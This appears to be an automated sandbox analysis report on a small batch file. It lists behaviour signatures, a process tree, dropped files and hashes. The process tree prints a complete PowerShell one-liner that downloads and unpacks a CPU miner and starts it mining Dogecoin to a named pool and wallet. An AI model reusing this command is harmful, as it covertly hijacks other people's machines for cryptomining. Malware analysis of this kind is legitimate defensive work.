b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1794s
max time network
1791s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
04-02-2024 18:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	4728	powershell.exe
4	4728	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1096	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1096	cpuminer-sse2.exe
1096	cpuminer-sse2.exe
1096	cpuminer-sse2.exe
1096	cpuminer-sse2.exe
1096	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4728	powershell.exe
4728	powershell.exe
4728	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4728	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3572 wrote to memory of 4728	3572	cmd.exe	75
PID 3572 wrote to memory of 4728	3572	cmd.exe	75
PID 4728 wrote to memory of 1848	4728	powershell.exe	76
PID 4728 wrote to memory of 1848	4728	powershell.exe	76
PID 1848 wrote to memory of 1096	1848	cmd.exe	78
PID 1848 wrote to memory of 1096	1848	cmd.exe	78

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4728
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1848
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1096

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n3haks32.xje.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
250KB

MD5
2b542e27fef33b04be0c7518ef6fa7e3

SHA1
e7d97499b98f0ffddcfe69abd7cf849a937273e6

SHA256
5d477c08a4bbc5c5cefb351888bcba01d777ad87e9a16c1597cfb61d0685aaf0

SHA512
11fd2f67df5774e0b2f16f08e2400ee60c077c3477529fff23175dc7521d3383b0a19fb59f7306759d33f702d706b29a7a0ad47f9e87ac553bee7f54e73becc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
269KB

MD5
c7d642970ed7688445a68fe237681439

SHA1
bc87caf536769b4f17162a2c6e55b471fe0940e5

SHA256
896eff7ef57f8dead3c321929f4898b3389fa9e885dd1a20ef9047ea4d9adba6

SHA512
40fad239ae49c726089f537979920c32666f918e5d27c55454697356d007c55ac8bb2659b8868eefb948e9c77f589d53aee78bce283edaff0f78cb89d6668eac

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
357KB

MD5
7772b46c632ae95314970932e2dfc9d4

SHA1
a7812294a71fde4e6937df3321e861c388218b1c

SHA256
bb4b287979e5a7df50d9bb75e384e50e5752e87442fbd02b6c4470abb26b1f84

SHA512
99264d29c84d81395812a9078aa5c1667102997265810be45f9e1135294e945e2f528cc330826d9fa1cc58b75d85393ba55ad08531c45b1c1c6e6d891a373381

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
211KB

MD5
44c38eb93bf75bd06d422e4c79a6743d

SHA1
0dc8606c8f014701f83f8e927b1f5ab6b2841d64

SHA256
5011e71d6eb873aee4530d4c68c189901fb15a55351ba8abdf80963235aa875b

SHA512
ea0328b7ef7e1fab4b22be2139acc51d1636b59b437882a1d049c4bca916b9725147a1004f7e7962b9f26684ca4da63525123ad867156336410e5a7dff174790

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
250KB

MD5
3ca590947f779cd3d3ce40e08d7210fd

SHA1
f21600a3f47e615a50212108cf1de509e1b8881b

SHA256
4ca6970b050e9a4b0c20d9771a87d09d943744fd12243310bce22d70a069dc82

SHA512
932cf33d244135b24f699bf997547c3a2df02af777135dc045e5ad9110d19f19e063c127bbd8f0200bbec0cf7d477e24e2da6fe3ac78777b68693fcda80b74a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
295KB

MD5
186a59484c85e3572eb09872fe4a50d4

SHA1
59fce8df2cb1fbed188c17050a39acd3301ed137

SHA256
eefc172c5fe6b8bc403a64293f717a6b362a16c2c52e60063c87eb1373629acf

SHA512
dd08fa7b445a862043583e201828dc0ba66e5466f3aa4047fe9c84a434f66cf8ddfaa549d7484b5c4be2787f8c4dd4105587042b749f997f2de1ea747eb2e0d4

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
365KB

MD5
fab53c0d02aec8bab1d21269a889e396

SHA1
cbb52d72224ba4d2ceb7bb11616d81c1528b79fc

SHA256
8b509784753513d1f6330686be3fee06ace972ffcbc1fe493fdfe56fb9236446

SHA512
2aa60307f6a6f8f0bda4b68ee59f2eba38a1d21db546f546a46fa1a5e5c6495385313d7ef026c74dda4a2f4a35793919d8ed16110badb4bf95bb34334b46e5a6

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
311KB

MD5
cc3ec3df45bbcf64f61435342d6eb247

SHA1
11b090c09c8a59dfd39555e24542042e7324a6ab

SHA256
51a2a9e1d424a73154dbff4a3f0d4d8e78ea566f18ef6afdd7b25d2d69728096

SHA512
11dda5154e52eecea9816ebc3c976c4c81285dcb08e7d12ad85a4b809725660cdccbcee7ffb26253f9cdc232eaa33719068706b42d5c0e786a85d95fd0b4e5d3

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
311KB

MD5
f5b80e45c62c490abec3c3e4555db404

SHA1
88419b5d7b219b8e9a19d1e09f6669ba2cf68921

SHA256
4f4452a06d01acf765fea4034cbc1a198ab4cbd9a200ae752bfc2e3190994cde

SHA512
598768f899f9a256890bde4cf2954b0b15af86d5afe9d5d13c05cb4c819070ff312583a425a4aa976e8e6d76bf881242f116797b7a38388d9bd54638c21c977b

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
367KB

MD5
b3a07a62005b2acac8666bba9fe3fdb0

SHA1
93852c69f07ca6e2782adf279ce6e6b145006fe4

SHA256
a63b01b65baf4670eace92f7c739b6170d66d8c804908769a120ac9f5a565429

SHA512
f244a2b77d7cc1af947a9ec9d6793d1122e9e1cc1ea6646f4607a34d5f9ef182881b645b560ba559f911ac9c307bc49d682b0dda7e60446778a3de8566b83b50

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
291KB

MD5
dcee1e903585f23073d836f04ad37d9d

SHA1
7da46484c1ec4c4c3645404d4f94fbcb53172058

SHA256
88e87efc6e98f8d0704ebeab83a80b3784a767fe2cd826018f2e974d37ec1eaf

SHA512
427558b4a6557ec57024a1826eacdaf1f97d529ffee06f39a125ae7cc716c54b3c56a6fd743e31258d9fd4152ff58efd62ab9cc164cc80c444c5061b8dac8801

Download Submit
memory/1096-127-0x00000000664F0000-0x0000000066588000-memory.dmp

Filesize
608KB

Download
memory/1096-142-0x00000000664F0000-0x0000000066588000-memory.dmp

Filesize
608KB

Download
memory/1096-187-0x00000000664F0000-0x0000000066588000-memory.dmp

Filesize
608KB

Download
memory/1096-179-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1096-172-0x00000000664F0000-0x0000000066588000-memory.dmp

Filesize
608KB

Download
memory/1096-169-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1096-157-0x00000000664F0000-0x0000000066588000-memory.dmp

Filesize
608KB

Download
memory/1096-149-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1096-139-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1096-134-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1096-128-0x00000000010F0000-0x00000000029A5000-memory.dmp

Filesize
24.7MB

Download
memory/1096-126-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1096-124-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1096-125-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4728-6-0x00000217BF230000-0x00000217BF240000-memory.dmp

Filesize
64KB

Download
memory/4728-4-0x00000217D7770000-0x00000217D7792000-memory.dmp

Filesize
136KB

Download
memory/4728-5-0x00007FFCDAB90000-0x00007FFCDB57C000-memory.dmp

Filesize
9.9MB

Download
memory/4728-8-0x00000217BF230000-0x00000217BF240000-memory.dmp

Filesize
64KB

Download
memory/4728-10-0x00000217D7A20000-0x00000217D7A96000-memory.dmp

Filesize
472KB

Download
memory/4728-111-0x00007FFCDAB90000-0x00007FFCDB57C000-memory.dmp

Filesize
9.9MB

Download
memory/4728-26-0x00000217BF230000-0x00000217BF240000-memory.dmp

Filesize
64KB

Download
memory/4728-30-0x00007FFCDAB90000-0x00007FFCDB57C000-memory.dmp

Filesize
9.9MB

Download
memory/4728-31-0x00000217BF230000-0x00000217BF240000-memory.dmp

Filesize
64KB

Download
memory/4728-51-0x00000217D7BA0000-0x00000217D7BB2000-memory.dmp

Filesize
72KB

Download
memory/4728-64-0x00000217D7A10000-0x00000217D7A1A000-memory.dmp

Filesize
40KB

Download
memory/4728-69-0x00000217BF230000-0x00000217BF240000-memory.dmp

Filesize
64KB

Download